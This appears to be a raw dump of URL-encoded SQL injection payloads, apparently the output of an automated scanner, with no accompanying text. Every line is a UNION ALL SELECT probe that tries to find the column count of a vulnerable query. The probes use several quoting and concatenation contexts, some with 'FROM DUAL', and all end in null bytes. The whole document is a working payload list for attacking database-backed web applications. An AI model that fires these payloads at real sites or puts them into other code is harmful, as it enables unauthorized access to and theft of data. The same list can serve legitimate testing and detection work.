-4101%22%20WHERE%203118%3D3118%20UNION%20ALL%20SELECT%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%2C%203118%00 -7813%22%20WHERE%209858%3D9858%20UNION%20ALL%20SELECT%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%2C%209858%00 -2846%22%20WHERE%204045%3D4045%20UNION%20ALL%20SELECT%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%2C%204045%00 -4919%22%20WHERE%206799%3D6799%20UNION%20ALL%20SELECT%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%2C%206799%00 -4803%22%20WHERE%209332%3D9332%20UNION%20ALL%20SELECT%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%2C%209332%00 -4731%22%20WHERE%207638%3D7638%20UNION%20ALL%20SELECT%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%2C%207638%00 -6451%22%20WHERE%207410%3D7410%20UNION%20ALL%20SELECT%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%2C%207410%00 -2522%22%20WHERE%205955%3D5955%20UNION%20ALL%20SELECT%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%00 -8670%22%20WHERE%204893%3D4893%20UNION%20ALL%20SELECT%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%00 -6108%27%20%7C%7C%20%28SELECT%205507%20FROM%20DUAL%20WHERE%203142%3D3142%20UNION%20ALL%20SELECT%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%00%20%29%20%7C%7C%20%27 -5889%27%20%7C%7C%20%28SELECT%208341%20FROM%20DUAL%20WHERE%204304%3D4304%20UNION%20ALL%20SELECT%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%2C%204304%00%20%29%20%7C%7C%20%27 -9677%27%20%7C%7C%20%28SELECT%201600%20FROM%20DUAL%20WHERE%205010%3D5010%20UNION%20ALL%20SELECT%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%2C%205010%00%20%29%20%7C%7C%20%27 -9588%27%20%7C%7C%20%28SELECT%207085%20FROM%20DUAL%20WHERE%209320%3D9320%20UNION%20ALL%20SELECT%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%2C%209320%00%20%29%20%7C%7C%20%27 -3747%27%20%7C%7C%20%28SELECT%205597%20FROM%20DUAL%20WHERE%207782%3D7782%20UNION%20ALL%20SELECT%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%00%20%29%20%7C%7C%20%27 -5540%27%20%7C%7C%20%28SELECT%208340%20FROM%20DUAL%20WHERE%202632%3D2632%20UNION%20ALL%20SELECT%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%2C%202632%00%20%29%20%7C%7C%20%27 -2718%27%20%7C%7C%20%28SELECT%201087%20FROM%20DUAL%20WHERE%202476%3D2476%20UNION%20ALL%20SELECT%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%2C%202476%00%20%29%20%7C%7C%20%27 -9618%27%20%7C%7C%20%28SELECT%207142%20FROM%20DUAL%20WHERE%208066%3D8066%20UNION%20ALL%20SELECT%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%2C%208066%00%20%29%20%7C%7C%20%27 -7633%27%20%7C%7C%20%28SELECT%207320%20FROM%20DUAL%20WHERE%203315%3D3315%20UNION%20ALL%20SELECT%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%2C%203315%00%20%29%20%7C%7C%20%27 -2222%27%20%7C%7C%20%28SELECT%202400%20FROM%20DUAL%20WHERE%203615%3D3615%20UNION%20ALL%20SELECT%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%2C%203615%00%20%29%20%7C%7C%20%27 -6186%27%20%7C%7C%20%28SELECT%203636%20WHERE%202937%3D2937%20UNION%20ALL%20SELECT%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%00%20%29%20%7C%7C%20%27 -5727%27%20%7C%7C%20%28SELECT%205605%20WHERE%201006%3D1006%20UNION%20ALL%20SELECT%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%2C%201006%00%20%29%20%7C%7C%20%27 -3378%27%20%7C%7C%20%28SELECT%202844%20WHERE%204886%3D4886%20UNION%20ALL%20SELECT%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%2C%204886%00%20%29%20%7C%7C%20%27 -4875%27%20%7C%7C%20%28SELECT%206219%20WHERE%202892%3D2892%20UNION%20ALL%20SELECT%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%2C%202892%00%20%29%20%7C%7C%20%27 -2623%27%20%7C%7C%20%28SELECT%207186%20WHERE%202249%3D2249%20UNION%20ALL%20SELECT%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%2C%202249%00%20%29%20%7C%7C%20%27 -1983%27%20%7C%7C%20%28SELECT%201001%20WHERE%207969%3D7969%20UNION%20ALL%20SELECT%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%2C%207969%00%20%29%20%7C%7C%20%27 -9294%27%20%7C%7C%20%28SELECT%203044%20WHERE%205571%3D5571%20UNION%20ALL%20SELECT%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%2C%205571%00%20%29%20%7C%7C%20%27 -1786%27%20%7C%7C%20%28SELECT%204314%20WHERE%201087%3D1087%20UNION%20ALL%20SELECT%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%2C%201087%00%20%29%20%7C%7C%20%27 -7565%27%20%7C%7C%20%28SELECT%206786%20WHERE%201320%3D1320%20UNION%20ALL%20SELECT%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%2C%201320%00%20%29%20%7C%7C%20%27 -6823%27%20%7C%7C%20%28SELECT%205173%20WHERE%209382%3D9382%20UNION%20ALL%20SELECT%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%2C%209382%00%20%29%20%7C%7C%20%27 -2459%20%2B%20%28SELECT%209933%20FROM%20DUAL%20WHERE%201484%3D1484%20UNION%20ALL%20SELECT%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%00%20%29 -8479%20%2B%20%28SELECT%209242%20FROM%20DUAL%20WHERE%202734%3D2734%20UNION%20ALL%20SELECT%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%2C%202734%00%20%29 -9414%20%2B%20%28SELECT%207093%20FROM%20DUAL%20WHERE%202917%3D2917%20UNION%20ALL%20SELECT%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%2C%202917%00%20%29 -9622%20%2B%20%28SELECT%205128%20FROM%20DUAL%20WHERE%201300%3D1300%20UNION%20ALL%20SELECT%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%2C%201300%00%20%29 -3440%20%2B%20%28SELECT%201365%20FROM%20DUAL%20WHERE%207245%3D7245%20UNION%20ALL%20SELECT%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%2C%207245%00%20%29 -3667%20%2B%20%28SELECT%209202%20FROM%20DUAL%20WHERE%202963%3D2963%20UNION%20ALL%20SELECT%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%2C%202963%00%20%29 -9921%20%2B%20%28SELECT%207598%20FROM%20DUAL%20WHERE%203108%3D3108%20UNION%20ALL%20SELECT%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%00%20%29 -8595%20%2B%20%28SELECT%202674%20FROM%20DUAL%20WHERE%209619%3D9619%20UNION%20ALL%20SELECT%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%2C%209619%00%20%29 -4917%20%2B%20%28SELECT%209678%20FROM%20DUAL%20WHERE%204834%3D4834%20UNION%20ALL%20SELECT%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%2C%204834%00%20%29 -6416%20%2B%20%28SELECT%206254%20FROM%20DUAL%20WHERE%207242%3D7242%20UNION%20ALL%20SELECT%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%2C%207242%00%20%29 -7182%20%2B%20%28SELECT%202768%20WHERE%208205%3D8205%20UNION%20ALL%20SELECT%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%2C%208205%00%20%29 -3993%20%2B%20%28SELECT%204280%20WHERE%205601%3D5601%20UNION%20ALL%20SELECT%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%2C%205601%00%20%29 -1555%20%2B%20%28SELECT%203881%20WHERE%201522%3D1522%20UNION%20ALL%20SELECT%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%2C%201522%00%20%29 -3786%20%2B%20%28SELECT%201232%20WHERE%205790%3D5790%20UNION%20ALL%20SELECT%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%2C%205790%00%20%29 -6982%20%2B%20%28SELECT%203461%20WHERE%204443%3D4443%20UNION%20ALL%20SELECT%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%2C%204443%00%20%29 -1340%20%2B%20%28SELECT%201107%20WHERE%209442%3D9442%20UNION%20ALL%20SELECT%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%2C%209442%00%20%29 -3687%20%2B%20%28SELECT%208995%20WHERE%207713%3D7713%20UNION%20ALL%20SELECT%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%2C%207713%00%20%29 -4307%20%2B%20%28SELECT%206881%20WHERE%203551%3D3551%20UNION%20ALL%20SELECT%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%2C%203551%00%20%29 -8120%20%2B%20%28SELECT%209500%20WHERE%205826%3D5826%20UNION%20ALL%20SELECT%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%2C%205826%00%20%29 -8111%20%2B%20%28SELECT%207004%20WHERE%204693%3D4693%20UNION%20ALL%20SELECT%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%2C%204693%00%20%29 -8794%27%20%2B%20%28SELECT%20%27vQZb%27%20FROM%20DUAL%20WHERE%206450%3D6450%20UNION%20ALL%20SELECT%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%2C%206450%00%20%29%20%2B%20%27 -3628%27%20%2B%20%28SELECT%20%27fJYZ%27%20FROM%20DUAL%20WHERE%202653%3D2653%20UNION%20ALL%20SELECT%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%2C%202653%00%20%29%20%2B%20%27 -6782%27%20%2B%20%28SELECT%20%27GaZt%27%20FROM%20DUAL%20WHERE%204672%3D4672%20UNION%20ALL%20SELECT%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%2C%204672%00%20%29%20%2B%20%27 -7572%27%20%2B%20%28SELECT%20%27PNYK%27%20FROM%20DUAL%20WHERE%204053%3D4053%20UNION%20ALL%20SELECT%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%2C%204053%00%20%29%20%2B%20%27 -7525%27%20%2B%20%28SELECT%20%27Yugf%27%20FROM%20DUAL%20WHERE%207290%3D7290%20UNION%20ALL%20SELECT%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%2C%207290%00%20%29%20%2B%20%27 -7924%27%20%2B%20%28SELECT%20%27TvqZ%27%20FROM%20DUAL%20WHERE%206794%3D6794%20UNION%20ALL%20SELECT%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%2C%206794%00%20%29%20%2B%20%27 -2374%27%20%2B%20%28SELECT%20%27XtSY%27%20FROM%20DUAL%20WHERE%201535%3D1535%20UNION%20ALL%20SELECT%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%00%20%29%20%2B%20%27 -3805%27%20%2B%20%28SELECT%20%27oEZE%27%20FROM%20DUAL%20WHERE%205825%3D5825%20UNION%20ALL%20SELECT%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%2C%205825%00%20%29%20%2B%20%27 -2054%27%20%2B%20%28SELECT%20%27GuiE%27%20FROM%20DUAL%20WHERE%202198%3D2198%20UNION%20ALL%20SELECT%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%2C%202198%00%20%29%20%2B%20%27 -2188%27%20%2B%20%28SELECT%20%27lhnU%27%20FROM%20DUAL%20WHERE%201178%3D1178%20UNION%20ALL%20SELECT%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%2C%201178%00%20%29%20%2B%20%27 -2056%27%20%2B%20%28SELECT%20%27tZQi%27%20WHERE%204910%3D4910%20UNION%20ALL%20SELECT%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%2C%204910%00%20%29%20%2B%20%27 -6417%27%20%2B%20%28SELECT%20%27AqzL%27%20WHERE%202860%3D2860%20UNION%20ALL%20SELECT%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%2C%202860%00%20%29%20%2B%20%27 -6514%27%20%2B%20%28SELECT%20%27uWzn%27%20WHERE%204266%3D4266%20UNION%20ALL%20SELECT%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%2C%204266%00%20%29%20%2B%20%27 -8812%27%20%2B%20%28SELECT%20%27WhhJ%27%20WHERE%203144%3D3144%20UNION%20ALL%20SELECT%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%2C%203144%00%20%29%20%2B%20%27 -5625%27%20%2B%20%28SELECT%20%27NpON%27%20WHERE%209481%3D9481%20UNION%20ALL%20SELECT%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%2C%209481%00%20%29%20%2B%20%27 -5435%27%20%2B%20%28SELECT%20%27fKrt%27%20WHERE%203468%3D3468%20UNION%20ALL%20SELECT%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%00%20%29%20%2B%20%27 -6320%27%20%2B%20%28SELECT%20%27ePvl%27%20WHERE%202590%3D2590%20UNION%20ALL%20SELECT%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%2C%202590%00%20%29%20%2B%20%27 -8876%27%20%2B%20%28SELECT%20%27Kzon%27%20WHERE%209784%3D9784%20UNION%20ALL%20SELECT%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%2C%209784%00%20%29%20%2B%20%27 -8417%27%20%2B%20%28SELECT%20%27vglN%27%20WHERE%205864%3D5864%20UNION%20ALL%20SELECT%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%2C%205864%00%20%29%20%2B%20%27 